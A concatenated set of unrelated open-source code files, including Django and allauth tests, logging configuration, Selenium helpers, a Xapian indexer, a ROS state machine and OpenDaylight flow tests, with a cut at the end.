self.ingest_mgr.validate_config_file(self.example_config_data) self.ingest_mgr.validate_properties() self.ingest_mgr.owner = self.user.pk job = self.ingest_mgr.create_ingest_job() assert (job.id is not None) assert (job.ingest_type == IngestJob.TILE_INGEST) assert (job.tile_size_x == 512) assert (job.tile_size_y == 512) assert (job.tile_size_z == 1) assert (job.tile_size_t == 1) def test_create_ingest_job_volumetric(self): self.ingest_mgr.validate_config_file(self.volumetric_config_data) self.ingest_mgr.validate_properties() self.ingest_mgr.owner = self.user.pk job = self.ingest_mgr.create_ingest_job() assert (job.id is not None) assert (job.ingest_type == IngestJob.VOLUMETRIC_INGEST) assert (job.tile_size_x == 1024) assert (job.tile_size_y == 1024) assert (job.tile_size_z == 64) assert (job.tile_size_t == 1) def test_generate_upload_queue_args_tile_job(self): """Ensure ingest_type set properly""" self.ingest_mgr.validate_config_file(self.example_config_data) self.ingest_mgr.validate_properties() self.ingest_mgr.owner = self.user.pk job = self.ingest_mgr.create_ingest_job() actual = self.ingest_mgr._generate_upload_queue_args(job) assert actual['ingest_type'] == IngestJob.TILE_INGEST assert actual['z_chunk_size'] == 16 def test_generate_upload_queue_args_volumetric_job(self): """Ensure ingest_type set properly""" self.ingest_mgr.validate_config_file(self.volumetric_config_data) self.ingest_mgr.validate_properties() self.ingest_mgr.owner = self.user.pk job = self.ingest_mgr.create_ingest_job() actual = self.ingest_mgr._generate_upload_queue_args(job) assert actual['ingest_type'] == IngestJob.VOLUMETRIC_INGEST assert actual['z_chunk_size'] == 64 assert actual['ingest_queue'] is None def test_tile_bucket_name(self): """ Test get tile bucket name""" tile_bucket_name = self.ingest_mgr.get_tile_bucket() assert(tile_bucket_name is not None) def test_get_resource_data(self): """Run the method and ensure keys set""" self.ingest_mgr.validate_config_file(self.example_config_data) self.ingest_mgr.validate_properties() self.ingest_mgr.owner = self.user.pk job = self.ingest_mgr.create_ingest_job() actual = self.ingest_mgr.get_resource_data(job.id) self.assertIn('boss_key', actual) self.assertIn('lookup_key', actual) self.assertIn('channel', actual) self.assertIn('experiment', actual) self.assertIn('coord_frame', actual)
1.867188
2
sanic_devtools/log.py
yunstanford/sanic-devtools
12
16768
<reponame>yunstanford/sanic-devtools import json import logging import logging.config import platform import re import traceback from io import StringIO import pygments from devtools import pformat from devtools.ansi import isatty, sformat from pygments.formatters import Terminal256Formatter from pygments.lexers import Python3TracebackLexer rs_dft_logger = logging.getLogger('sdev.server.dft') rs_aux_logger = logging.getLogger('sdev.server.aux') tools_logger = logging.getLogger('sdev.tools') main_logger = logging.getLogger('sdev.main') LOG_FORMATS = { logging.DEBUG: sformat.dim, logging.INFO: sformat.green, logging.WARN: sformat.yellow, } pyg_lexer = Python3TracebackLexer() pyg_formatter = Terminal256Formatter(style='vim') split_log = re.compile(r'^(\[.*?\])') class HighlightStreamHandler(logging.StreamHandler): def setFormatter(self, fmt): self.formatter = fmt self.formatter.stream_is_tty = isatty(self.stream) and platform.system().lower() != 'windows' class DefaultFormatter(logging.Formatter): def __init__(self, fmt=None, datefmt=None, style='%'): super().__init__(fmt, datefmt, style) self.stream_is_tty = False def format(self, record): msg = super().format(record) if not self.stream_is_tty: return msg m = split_log.match(msg) log_color = LOG_FORMATS.get(record.levelno, sformat.red) if m: time = sformat(m.groups()[0], sformat.magenta) return time + sformat(msg[m.end():], log_color) else: return sformat(msg, log_color) class AccessFormatter(logging.Formatter): """ Used to log sanic_access and sanic_server """ def __init__(self, fmt=None, datefmt=None, style='%'): super().__init__(fmt, datefmt, style) self.stream_is_tty = False def formatMessage(self, record): msg = super().formatMessage(record) if msg[0] != '{': return msg # json from AccessLogger obj = json.loads(msg) if self.stream_is_tty: # in future we can do clever things about colouring the message based on status code msg = '{} {} {}'.format( sformat(obj['time'], sformat.magenta), sformat(obj['prefix'], sformat.blue), sformat(obj['msg'], sformat.dim if obj['dim'] else sformat.reset), ) else: msg = '{time} {prefix} {msg}'.format(**obj) details = getattr(record, 'details', None) if details: msg = 'details: {}\n{}'.format(pformat(details, highlight=self.stream_is_tty), msg) return msg def formatException(self, ei): sio = StringIO() traceback.print_exception(*ei, file=sio) stack = sio.getvalue() sio.close() if self.stream_is_tty and pyg_lexer: return pygments.highlight(stack, lexer=pyg_lexer, formatter=pyg_formatter).rstrip('\n') else: return stack def log_config(verbose: bool) -> dict: """ Setup default config. for dictConfig. :param verbose: level: DEBUG if True, INFO if False :return: dict suitable for ``logging.config.dictConfig`` """ log_level = 'DEBUG' if verbose else 'INFO' return { 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'default': { 'format': '[%(asctime)s] %(message)s', 'datefmt': '%H:%M:%S', 'class': 'sanic_devtools.log.DefaultFormatter', }, 'no_ts': { 'format': '%(message)s', 'class': 'sanic_devtools.log.DefaultFormatter', }, 'sanic': { 'format': '%(message)s', 'class': 'sanic_devtools.log.AccessFormatter', }, }, 'handlers': { 'default': { 'level': log_level, 'class': 'sanic_devtools.log.HighlightStreamHandler', 'formatter': 'default' }, 'no_ts': { 'level': log_level, 'class': 'sanic_devtools.log.HighlightStreamHandler', 'formatter': 'no_ts' }, 'sanic_access': { 'level': log_level, 'class': 'sanic_devtools.log.HighlightStreamHandler', 'formatter': 'sanic' }, 'sanic_server': { 'class': 'sanic_devtools.log.HighlightStreamHandler', 'formatter': 'sanic' }, }, 'loggers': { rs_dft_logger.name: { 'handlers': ['default'], 'level': log_level, }, rs_aux_logger.name: { 'handlers': ['default'], 'level': log_level, }, tools_logger.name: { 'handlers': ['default'], 'level': log_level, }, main_logger.name: { 'handlers': ['no_ts'], 'level': log_level, }, 'sanic.access': { 'handlers': ['sanic_access'], 'level': log_level, 'propagate': False, }, 'sanic.server': { 'handlers': ['sanic_server'], 'level': log_level, }, }, } def setup_logging(verbose): config = log_config(verbose) logging.config.dictConfig(config)
1.929688
2
rest_fhir/mixins/conditional_read.py
weynelucas/django-rest-fhir
2
16769
import calendar from typing import Union import dateutil.parser from rest_framework import status from rest_framework.response import Response from django.utils.cache import get_conditional_response from django.utils.http import http_date from ..models import Resource, ResourceVersion FhirResource = Union[Resource, ResourceVersion] class ConditionalReadMixin: def conditional_read(self, request, *args, **kwargs): instance = self.get_object() serializer = self.get_serializer(instance) res_data = serializer.data # Test If-Modified-Since and If-None-Match preconditions # https://www.hl7.org/fhir/http.html#cread etag, last_modified = self.get_conditional_args(res_data) response = get_conditional_response(request, etag, last_modified) if response is not None: return response # Set revelant header on the response if request method is safe headers = self.get_conditional_headers(res_data) return Response( data=res_data, status=status.HTTP_200_OK, headers=headers, ) def etag_func(self, data) -> str: return 'W/"%s"' % data['meta']['versionId'] def last_modified_func(self, data) -> str: dt = dateutil.parser.parse(data['meta']['lastUpdated']) return calendar.timegm(dt.utctimetuple()) def get_conditional_args(self, data: dict): etag = self.etag_func(data) last_modified = self.last_modified_func(data) return ( etag, last_modified, ) def get_conditional_headers(self, data): etag, last_modified = self.get_conditional_args(data) headers = dict() if etag: headers['ETag'] = etag if last_modified: headers['Last-Modified'] = http_date(last_modified) return headers
2.1875
2
code_week27_1026_111/sort_colors.py
dylanlee101/leetcode
0
16770
<filename>code_week27_1026_111/sort_colors.py ''' 给定一个包含红色、白色和蓝色,一共 n 个元素的数组,原地对它们进行排序,使得相同颜色的元素相邻,并按照红色、白色、蓝色顺序排列。 此题中,我们使用整数 0、 1 和 2 分别表示红色、白色和蓝色。 注意: 不能使用代码库中的排序函数来解决这道题。 示例: 输入: [2,0,2,1,1,0] 输出: [0,0,1,1,2,2] 进阶: 一个直观的解决方案是使用计数排序的两趟扫描算法。 首先,迭代计算出0、1 和 2 元素的个数,然后按照0、1、2的排序,重写当前数组。 你能想出一个仅使用常数空间的一趟扫描算法吗? 来源:力扣(LeetCode) 链接:https://leetcode-cn.com/problems/sort-colors ''' class Solution: def sortColors(self, nums: List[int]) -> None: """ Do not return anything, modify nums in-place instead. """ n = len(nums) ptr = 0 for i in range(n): if nums[i] == 0: nums[i],nums[ptr] = nums[ptr],nums[i] ptr += 1 for i in range(ptr,n): if nums[i] == 1: nums[i],nums[ptr] = nums[ptr],nums[i] ptr +=1
3.8125
4
solutions/lowest_common_ancestor_deepest_leaves/__main__.py
ansonmiu0214/dsa-worked-solutions
0
16771
<reponame>ansonmiu0214/dsa-worked-solutions<filename>solutions/lowest_common_ancestor_deepest_leaves/__main__.py from .solution import lcaDeepestLeaves from ..utils import TreeNode print('Enter tree, e.g. [2,3,1,3,1,null,1]:', end=' ') nodes = [int(node) if node != 'null' else None for node in input().strip().split(',')] root = TreeNode.fromList(nodes) lowestCommonAncestor = lcaDeepestLeaves(root) print(f'The lowest common ancestor is: {lowestCommonAncestor.toList()}')
3.078125
3
code/python3/index_values_with_geo.py
jaylett/xapian-docsprint
47
16772
#!/usr/bin/env python import json from support import parse_states import sys import xapian def index(datapath, dbpath): # Create or open the database we're going to be writing to. db = xapian.WritableDatabase(dbpath, xapian.DB_CREATE_OR_OPEN) # Set up a TermGenerator that we'll use in indexing. termgenerator = xapian.TermGenerator() termgenerator.set_stemmer(xapian.Stem("en")) for fields in parse_states(datapath): # 'fields' is a dictionary mapping from field name to value. # Pick out the fields we're going to index. name = fields.get('name', u'') description = fields.get('description', u'') motto = fields.get('motto', u'') admitted = fields.get('admitted', None) population = fields.get('population', None) order = fields.get('order', u'') # We make a document and tell the term generator to use this. doc = xapian.Document() termgenerator.set_document(doc) # index each field with a suitable prefix termgenerator.index_text(name, 1, 'S') termgenerator.index_text(description, 1, 'XD') termgenerator.index_text(motto, 1, 'XM') # Index fields without prefixes for general search. termgenerator.index_text(name) termgenerator.increase_termpos() termgenerator.index_text(description) termgenerator.increase_termpos() termgenerator.index_text(motto) # Add document values. if admitted is not None: doc.add_value(1, xapian.sortable_serialise(int(admitted[:4]))) doc.add_value(2, admitted) # YYYYMMDD if population is not None: doc.add_value(3, xapian.sortable_serialise(int(population))) ### Start of example code. midlat = fields['midlat'] midlon = fields['midlon'] if midlat and midlon: doc.add_value(4, "%f,%f" % (float(midlat), float(midlon))) ### End of example code. # Store all the fields for display purposes. doc.set_data(json.dumps(fields)) # We use the order to ensure each object ends up in the # database only once no matter how many times we run the # indexer. idterm = u"Q" + order doc.add_boolean_term(idterm) db.replace_document(idterm, doc) if len(sys.argv) != 3: print("Usage: %s DATAPATH DBPATH" % sys.argv[0]) sys.exit(1) index(datapath = sys.argv[1], dbpath = sys.argv[2])
2.609375
3
logger.py
drewstone/dynamic-governanceq
0
16773
<filename>logger.py import constants def init(mode, gov, agents): if mode == constants.DEBUG_LOGGING or mode == constants.LOG_INIT: print("Agents = {}".format( list(map(lambda agent: agent.capacity, agents)))) print("Starting param: {}".format(gov.param)) def round(mode, round, gov, throughput): if mode == constants.DEBUG_LOGGING or mode == constants.LOG_ROUND: print("\nRound {} | OLD_P = {}, NEW_P = {}, TPS = {}, RULE = {}\n" .format(round, gov.prev_param, gov.param, throughput, gov.decision_type)) def dropout(mode, active, inactive): if mode == constants.DEBUG_LOGGING or mode == constants.LOG_DROPOUT: print("Active agents: {}".format( list(map(lambda a: a.capacity, active)))) print("Inactive agents: {}".format( list(map(lambda a: a.capacity, inactive)))) def payments(mode, payments): if mode == constants.DEBUG_LOGGING or mode == constants.LOG_PAYMENTS: if payments: payment_logs = list(map(lambda p: "Param {} => {}" .format(p[1], p[0]), payments)) print("\t\t\tPayments\n" + "\n".join(payment_logs))
2.78125
3
test/core/bad_ssl/gen_build_yaml.py
Akrog/grpc
3
16774
<filename>test/core/bad_ssl/gen_build_yaml.py #!/usr/bin/env python2.7 # Copyright 2015 gRPC authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Generates the appropriate build.json data for all the end2end tests.""" import collections import yaml TestOptions = collections.namedtuple('TestOptions', 'flaky cpu_cost') default_test_options = TestOptions(False, 1.0) # maps test names to options BAD_CLIENT_TESTS = { 'cert': default_test_options._replace(cpu_cost=0.1), # Disabling this test because it does not link correctly as written # 'alpn': default_test_options._replace(cpu_cost=0.1), } def main(): json = { '#': 'generated with test/bad_ssl/gen_build_json.py', 'libs': [{ 'name': 'bad_ssl_test_server', 'build': 'private', 'language': 'c', 'src': ['test/core/bad_ssl/server_common.cc'], 'headers': ['test/core/bad_ssl/server_common.h'], 'vs_proj_dir': 'test', 'platforms': ['linux', 'posix', 'mac'], 'deps': ['grpc_test_util', 'grpc', 'gpr'] }], 'targets': [{ 'name': 'bad_ssl_%s_server' % t, 'build': 'test', 'language': 'c', 'run': False, 'src': ['test/core/bad_ssl/servers/%s.cc' % t], 'vs_proj_dir': 'test/bad_ssl', 'platforms': ['linux', 'posix', 'mac'], 'deps': ['bad_ssl_test_server', 'grpc_test_util', 'grpc', 'gpr'] } for t in sorted(BAD_CLIENT_TESTS.keys())] + [{ 'name': 'bad_ssl_%s_test' % t, 'cpu_cost': BAD_CLIENT_TESTS[t].cpu_cost, 'build': 'test', 'language': 'c', 'src': ['test/core/bad_ssl/bad_ssl_test.cc'], 'vs_proj_dir': 'test', 'platforms': ['linux', 'posix', 'mac'], 'deps': ['grpc_test_util', 'grpc', 'gpr'] } for t in sorted(BAD_CLIENT_TESTS.keys())] } print yaml.dump(json) if __name__ == '__main__': main()
2.09375
2
tests/test_providers.py
thejoeejoee/django-allauth-cas
0
16775
<filename>tests/test_providers.py # -*- coding: utf-8 -*- from six.moves.urllib.parse import urlencode from django.contrib import messages from django.contrib.messages.api import get_messages from django.contrib.messages.middleware import MessageMiddleware from django.contrib.messages.storage.base import Message from django.contrib.sessions.middleware import SessionMiddleware from django.test import RequestFactory, TestCase, override_settings from allauth.socialaccount.providers import registry from allauth_cas.views import AuthAction from .example.provider import ExampleCASProvider class CASProviderTests(TestCase): def setUp(self): self.request = self._get_request() self.provider = ExampleCASProvider(self.request) def _get_request(self): request = RequestFactory().get('/test/') SessionMiddleware(lambda: None).process_request(request) MessageMiddleware(lambda: None).process_request(request) return request def test_register(self): """ Example CAS provider is registered as social account provider. """ self.assertIsInstance(registry.by_id('theid'), ExampleCASProvider) def test_get_login_url(self): url = self.provider.get_login_url(self.request) self.assertEqual('/accounts/theid/login/', url) url_with_qs = self.provider.get_login_url( self.request, next='/path?quéry=string&two=whoam%C3%AF', ) self.assertEqual( url_with_qs, '/accounts/theid/login/?next=%2Fpath%3Fqu%C3%A9ry%3Dstring%26two%3' 'Dwhoam%25C3%25AF' ) def test_get_callback_url(self): url = self.provider.get_callback_url(self.request) self.assertEqual('/accounts/theid/login/callback/', url) url_with_qs = self.provider.get_callback_url( self.request, next='/path?quéry=string&two=whoam%C3%AF', ) self.assertEqual( url_with_qs, '/accounts/theid/login/callback/?next=%2Fpath%3Fqu%C3%A9ry%3Dstrin' 'g%26two%3Dwhoam%25C3%25AF' ) def test_get_logout_url(self): url = self.provider.get_logout_url(self.request) self.assertEqual('/accounts/theid/logout/', url) url_with_qs = self.provider.get_logout_url( self.request, next='/path?quéry=string&two=whoam%C3%AF', ) self.assertEqual( url_with_qs, '/accounts/theid/logout/?next=%2Fpath%3Fqu%C3%A9ry%3Dstring%26two%' '3Dwhoam%25C3%25AF' ) @override_settings(SOCIALACCOUNT_PROVIDERS={ 'theid': { 'AUTH_PARAMS': {'key': 'value'}, }, }) def test_get_auth_params(self): action = AuthAction.AUTHENTICATE auth_params = self.provider.get_auth_params(self.request, action) self.assertDictEqual(auth_params, { 'key': 'value', }) @override_settings(SOCIALACCOUNT_PROVIDERS={ 'theid': { 'AUTH_PARAMS': {'key': 'value'}, }, }) def test_get_auth_params_with_dynamic(self): factory = RequestFactory() request = factory.get( '/test/?auth_params=next%3Dtwo%253Dwhoam%2525C3%2525AF%2526qu%2525' 'C3%2525A9ry%253Dstring' ) request.session = {} action = AuthAction.AUTHENTICATE auth_params = self.provider.get_auth_params(request, action) self.assertDictEqual(auth_params, { 'key': 'value', 'next': 'two=whoam%C3%AF&qu%C3%A9ry=string', }) def test_add_message_suggest_caslogout(self): expected_msg_base_str = ( "To logout of The Provider, please close your browser, or visit " "this <a href=\"/accounts/theid/logout/?{}\">link</a>." ) # Defaults. req1 = self.request self.provider.add_message_suggest_caslogout(req1) expected_msg1 = Message( messages.INFO, expected_msg_base_str.format(urlencode({'next': '/test/'})), ) self.assertIn(expected_msg1, get_messages(req1)) # Custom arguments. req2 = self._get_request() self.provider.add_message_suggest_caslogout( req2, next_page='/redir/', level=messages.WARNING) expected_msg2 = Message( messages.WARNING, expected_msg_base_str.format(urlencode({'next': '/redir/'})), ) self.assertIn(expected_msg2, get_messages(req2)) def test_message_suggest_caslogout_on_logout(self): self.assertFalse( self.provider.message_suggest_caslogout_on_logout(self.request)) with override_settings(SOCIALACCOUNT_PROVIDERS={ 'theid': {'MESSAGE_SUGGEST_CASLOGOUT_ON_LOGOUT': True}, }): self.assertTrue( self.provider .message_suggest_caslogout_on_logout(self.request) ) @override_settings(SOCIALACCOUNT_PROVIDERS={ 'theid': { 'MESSAGE_SUGGEST_CASLOGOUT_ON_LOGOUT_LEVEL': messages.WARNING, }, }) def test_message_suggest_caslogout_on_logout_level(self): self.assertEqual(messages.WARNING, ( self.provider .message_suggest_caslogout_on_logout_level(self.request) )) def test_extract_uid(self): response = 'useRName', {} uid = self.provider.extract_uid(response) self.assertEqual('useRName', uid) def test_extract_common_fields(self): response = 'useRName', {} common_fields = self.provider.extract_common_fields(response) self.assertDictEqual(common_fields, { 'username': 'useRName', 'first_name': None, 'last_name': None, 'name': None, 'email': None, }) def test_extract_common_fields_with_extra(self): response = 'useRName', {'username': 'user', 'email': '<EMAIL>'} common_fields = self.provider.extract_common_fields(response) self.assertDictEqual(common_fields, { 'username': 'user', 'first_name': None, 'last_name': None, 'name': None, 'email': '<EMAIL>', }) def test_extract_extra_data(self): response = 'useRName', {'user_attr': 'thevalue', 'another': 'value'} extra_data = self.provider.extract_extra_data(response) self.assertDictEqual(extra_data, { 'user_attr': 'thevalue', 'another': 'value', 'uid': 'useRName', })
2.078125
2
infoblox_netmri/api/remote/models/device_password_log_remote.py
IngmarVG-IB/infoblox-netmri
0
16776
<reponame>IngmarVG-IB/infoblox-netmri from ..remote import RemoteModel from infoblox_netmri.utils.utils import check_api_availability class DevicePasswordLogRemote(RemoteModel): """ This table list out entries of DevicePasswordLog | ``DevicePwLogID:`` The internal NetMRI identifier for the device password log. | ``attribute type:`` number | ``DataSourceID:`` The internal NetMRI identifier for the collector NetMRI that collected this data record. | ``attribute type:`` number | ``DeviceID:`` The internal NetMRI identifier for the device from which device password log table information was collected. | ``attribute type:`` number | ``DevicePwLogTimestamp:`` The date and time this record was collected or calculated. | ``attribute type:`` datetime | ``DevicePwLogProtocol:`` The protocol of the device password log. | ``attribute type:`` string | ``DevicePwLogPassword:`` The password of the device password log. | ``attribute type:`` string | ``DevicePwLogSNMPAuthProto:`` The SNMP password is authenticated for the device password log. | ``attribute type:`` string | ``DevicePwLogSNMPPrivProto:`` The SNMP private password protocol of the device password log. | ``attribute type:`` string | ``DevicePwLogStatus:`` The status of the device password log. | ``attribute type:`` string | ``DevicePwLogPasswordSecure:`` The password of the device password log. | ``attribute type:`` string | ``DevicePwLogUsernameSecure:`` The username of the device password log. | ``attribute type:`` string | ``DevicePwLogEnablePasswordSecure:`` The password is enabled for device password log. | ``attribute type:`` string | ``DevicePwLogSNMPAuthPWSecure:`` The SNMP password is authenticated for the device password log. | ``attribute type:`` string | ``DevicePwLogSNMPPrivPWSecure:`` The SNMP private password of the device password log. | ``attribute type:`` string | ``SecureVersion:`` The encryption version of the username and passwords. | ``attribute type:`` number """ properties = ("DevicePwLogID", "DataSourceID", "DeviceID", "DevicePwLogTimestamp", "DevicePwLogProtocol", "DevicePwLogPassword", "DevicePwLogSNMPAuthProto", "DevicePwLogSNMPPrivProto", "DevicePwLogStatus", "DevicePwLogPasswordSecure", "DevicePwLogUsernameSecure", "DevicePwLogEnablePasswordSecure", "DevicePwLogSNMPAuthPWSecure", "DevicePwLogSNMPPrivPWSecure", "SecureVersion", ) @property @check_api_availability def data_source(self): """ The collector NetMRI that collected this data record. ``attribute type:`` model """ return self.broker.data_source(**{"DevicePwLogID": self.DevicePwLogID }) @property @check_api_availability def device(self): """ The device from which this data was collected. ``attribute type:`` model """ return self.broker.device(**{"DevicePwLogID": self.DevicePwLogID }) @property @check_api_availability def infradevice(self): """ The device from which this data was collected. ``attribute type:`` model """ return self.broker.infradevice(**{"DevicePwLogID": self.DevicePwLogID })
2.09375
2
selenium_utils/element.py
defactto/selenium-utils
7
16777
import logging import time from selenium.common import exceptions from selenium.webdriver.remote.webdriver import WebDriver from selenium.webdriver.common import action_chains from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.support.ui import WebDriverWait from selenium_utils import exception logger = logging.getLogger(__name__) def hover_over_element(driver: WebDriver, element): """Moves the mouse pointer to the element and hovers""" action_chains.ActionChains(driver).move_to_element(element).perform() def wait_until_stops_moving(element, wait_seconds=1): """Waits until the element stops moving Args: selenium.webdriver.remote.webelement.WebElement """ prev_location = None timer_begin = time.time() while prev_location != element.location: prev_location = element.location time.sleep(0.1) if time.time() - timer_begin > wait_seconds: raise exception.ElementMovingTimeout def get_when_visible(driver: WebDriver, locator, wait_seconds=1): """ Args: driver (base.CustomDriver) locator (tuple) Returns: selenium.webdriver.remote.webelement.WebElement """ return WebDriverWait( driver, wait_seconds) \ .until(EC.presence_of_element_located(locator)) def wait_until_condition(driver: WebDriver, condition, wait_seconds=1): """Wait until given expected condition is met""" WebDriverWait( driver, wait_seconds).until(condition) def wait_until_not_present(driver: WebDriver, locator): """Wait until no element(-s) for locator given are present in the DOM.""" wait_until_condition(driver, lambda d: len(d.find_elements(*locator)) == 0) def get_when_all_visible(driver: WebDriver, locator, wait_seconds=1): """Return WebElements by locator when all of them are visible. Args: locator (tuple) Returns: selenium.webdriver.remote.webelement.WebElements """ return WebDriverWait( driver, wait_seconds) \ .until(EC.visibility_of_any_elements_located(locator)) def get_when_clickable(driver: WebDriver, locator, wait_seconds=1): """ Args: driver (base.CustomDriver) locator (tuple) Returns: selenium.webdriver.remote.webelement.WebElement """ return WebDriverWait( driver, wait_seconds) \ .until(EC.element_to_be_clickable(locator)) def get_when_invisible(driver: WebDriver, locator, wait_seconds=1): """ Args: driver (base.CustomDriver) locator (tuple) Returns: selenium.webdriver.remote.webelement.WebElement """ return WebDriverWait( driver, wait_seconds) \ .until(EC.invisibility_of_element_located(locator)) def wait_for_element_text(driver: WebDriver, locator, text, wait_seconds=1): """ Args: driver (base.CustomDriver) locator (tuple) text (str) """ return WebDriverWait( driver, wait_seconds) \ .until(EC.text_to_be_present_in_element(locator, text)) def is_value_in_attr(element, attr="class", value="active"): """Checks if the attribute value is present for given attribute Args: element (selenium.webdriver.remote.webelement.WebElement) attr (basestring): attribute name e.g. "class" value (basestring): value in the class attribute that indicates the element is now active/opened Returns: bool """ attributes = element.get_attribute(attr) return value in attributes.split() def click_on_staleable_element(driver: WebDriver, el_locator, wait_seconds=1): """Clicks an element that can be modified between the time we find it and when we click on it""" time_start = time.time() while time.time() - time_start < wait_seconds: try: driver.find_element(*el_locator).click() break except exceptions.StaleElementReferenceException as e: logger.error(str(e)) time.sleep(0.1) else: raise exception.ElementNotFound(el_locator) def scroll_into_view(driver: WebDriver, element, offset_pixels=0): """Scrolls page to element using JS""" driver.execute_script("return arguments[0].scrollIntoView();", element) # compensate for the header driver.execute_script("window.scrollBy(0, -{});".format(offset_pixels)) return element
2.734375
3
modules/iib_applications.py
satbel/ib-metrics-pyclient
0
16778
<filename>modules/iib_applications.py<gh_stars>0 # -*- coding: utf-8 -*- """Various functions for ib applications.""" from modules.iib_api import get_status def get_metric_name(metric_label): """Returns pushgateway formatted metric name.""" return 'ib_application_{0}'.format(metric_label) def get_metric_annotation(): """Returns dictionary with annotations 'HELP' and 'TYPE' for metrics.""" annotations = { 'status': '# HELP {0} Current status of IB application.\n\ # TYPE {0} gauge\n'.format(get_metric_name('status'))} return annotations def format_applications(applications, broker_name): """Returns string with all metrics for all applications which ready to push to pushgateway.""" metrics_annotation = get_metric_annotation() app_metric_data = str() for app in applications: app_list = app.split() egname, app_name, status = app_list[6], app_list[2], app_list[8].replace(".","") template_string = 'egname="{0}", brokername="{1}", appname="{2}"'.format( egname.replace("'", ""), broker_name, app_name.replace("'", "")) app_metric = '{0}{{{1}}} {2}\n'.format( get_metric_name(metric_label='status'), template_string, get_status(status=status)) app_metric_data += app_metric app_metric_data = '{0}{1}'.format( metrics_annotation['status'], app_metric_data) return app_metric_data
2.25
2
clock.py
hcjk/kitchen-bot
0
16779
import os import requests import psycopg2 import db_lib as db from app import send_message, log from apscheduler.schedulers.blocking import BlockingScheduler DATABASE_URL = os.environ['DATABASE_URL'] conn = psycopg2.connect(DATABASE_URL, sslmode='require') def kitchen_reminder(): # fetch current status status = db.getStatus(conn) # if notify is disabled, no operation needed if status == "DISABLED": log("kitchen_reminder trigger; bot NOTIFY_STATUS is disabled") return "ok", 200 currentBoyNum = db.getBoyNum(conn) # if first day has passed if currentBoyNum == 1: # increment day currentBoy = db.getBoy(conn) db.changeDay(conn, currentBoy) # if second day has passed elif currentBoyNum == 2: # pass responsiblity currentBoy = db.getBoy(conn) nextBoy = db.getNextBoy(conn) db.updateBoy(conn, currentBoy, nextBoy) # send message to new kitchen boy msg = "{}, it is your kitchen day!".format(db.getNickname(conn, nextBoy)) send_message(msg, [nextBoy]) else: log("Error: getBoyNum() returned an unexpected value: {}".format(currentBoyNum)) return "ok", 200 def rent_reminder(): msg = "Don't forget to pay rent!" send_message(msg, db.getAll(conn)) return "ok", 200 sched = BlockingScheduler() sched.add_job(kitchen_reminder, 'cron', hour=0, minute=0) sched.add_job(rent_reminder, 'cron', day=1) sched.start()
2.625
3
ucf_sub_catkin_ros/src/sub_states/src/qual/test.py
RoboticsClubatUCF/RoboSub
0
16780
#!/usr/bin/env python import rospy import smach import gate import pole class SubStates: def __init__(self): rospy.loginfo("State Machine has started.") self.gate = smach.StateMachine(outcomes=['preempted', 'POLE', 'GATE']) self.pole = smach.StateMachine(outcomes=['preempted', 'GATE', 'POLE']) self.tasks = smach.StateMachine(outcomes=['POLE', 'GATE', 'preempted', self.gate, self.pole]) with self.tasks: smach.StateMachine.add('Start', self.pole, transitions={'POLE':self.pole, 'GATE':self.gate}) with self.gate: smach.StateMachine.add('LOCATE', gate.locate(), transitions={'preempted':'preempted', 'success': 'ALIGN', 'failure': 'LOCATE'}) smach.StateMachine.add('ALIGN', gate.align(), transitions={'preempted':'preempted', 'success': 'THROUGH', 'failure': 'LOCATE'}) smach.StateMachine.add('THROUGH', gate.through(), transitions={'preempted':'preempted', 'success': 'POLE', 'failure':'LOCATE'}) with self.pole: smach.StateMachine.add('LOCATE', pole.locate(), transitions={'preempted':'preempted', 'success': 'ALIGN', 'failure': 'LOCATE'}) smach.StateMachine.add('ALIGN', pole.align(), transitions={'preempted':'preempted', 'success': 'DRIFT', 'failure': 'LOCATE'}) smach.StateMachine.add('DRIFT', pole.drift(), transitions={'preempted':'preempted', 'success': 'GATE', 'failure': 'LOCATE'}) if __name__ == '__main__': rospy.init_node('hippo_sm') sm = SubStates() outcome = sm.tasks.execute() rospy.spin()
2.34375
2
networkapi/plugins/SDN/ODL/tests/test_send_flows_with_tcp_flags.py
vinicius-marinho/GloboNetworkAPI
73
16781
<reponame>vinicius-marinho/GloboNetworkAPI<filename>networkapi/plugins/SDN/ODL/tests/test_send_flows_with_tcp_flags.py from networkapi.test.test_case import NetworkApiTestCase from networkapi.plugins.SDN.ODL.flows.acl import AclFlowBuilder class TestSendFlowsWithTCPFlags(NetworkApiTestCase): """ Class to test flows that have tcp flags on it """ def test_flow_with_ack_flag(self): """ Try to send a flow with ACK flag """ acl = { "kind": "acl_with_tcp_flags", "rules": [{ "action": "permit", "description": "ACK access", "destination": "10.0.0.0/8", "id": "300", "l4-options": { "flags": [ "ACK" ] }, "owner": "networkapi", "protocol": "tcp", "source": "0.0.0.0/0" }] } # Beryllium flows = AclFlowBuilder(acl, environment=0, version='BERYLLIUM') flow = flows.build().next() tcp_flag = flow['flow'][0]['match']['tcp-flag-match']['tcp-flag'] assert tcp_flag == 16 # Carbon flows = AclFlowBuilder(acl, environment=0, version='CARBON') flow = flows.build().next() tcp_flag = flow['flow'][0]['match']['tcp-flags-match']['tcp-flags'] assert tcp_flag == 16 # Boron flows = AclFlowBuilder(acl, environment=0, version='BORON') flow = flows.build().next() tcp_flag = flow['flow'][0]['match']['tcp-flags-match']['tcp-flags'] assert tcp_flag == 16 # Nitrogen flows = AclFlowBuilder(acl, environment=0, version='NITROGEN') flow = flows.build().next() tcp_flag = flow['flow'][0]['match']['tcp-flags-match']['tcp-flags'] assert tcp_flag == 16 def test_flow_with_RST_flag(self): """ Try to send a flow with RST flag """ acl = { "kind": "acl_with_tcp_flags", "rules": [{ "action": "permit", "description": "RST access", "destination": "10.0.0.0/8", "id": "200", "l4-options": { "flags": [ "RST" ] }, "owner": "networkapi", "protocol": "tcp", "source": "0.0.0.0/0" }] } # Beryllium flows = AclFlowBuilder(acl, environment=0, version='BERYLLIUM') flow = flows.build().next() tcp_flag = flow['flow'][0]['match']['tcp-flag-match']['tcp-flag'] assert tcp_flag == 4 # Carbon flows = AclFlowBuilder(acl, environment=0, version='CARBON') flow = flows.build().next() tcp_flag = flow['flow'][0]['match']['tcp-flags-match']['tcp-flags'] assert tcp_flag == 4 # Boron flows = AclFlowBuilder(acl, environment=0, 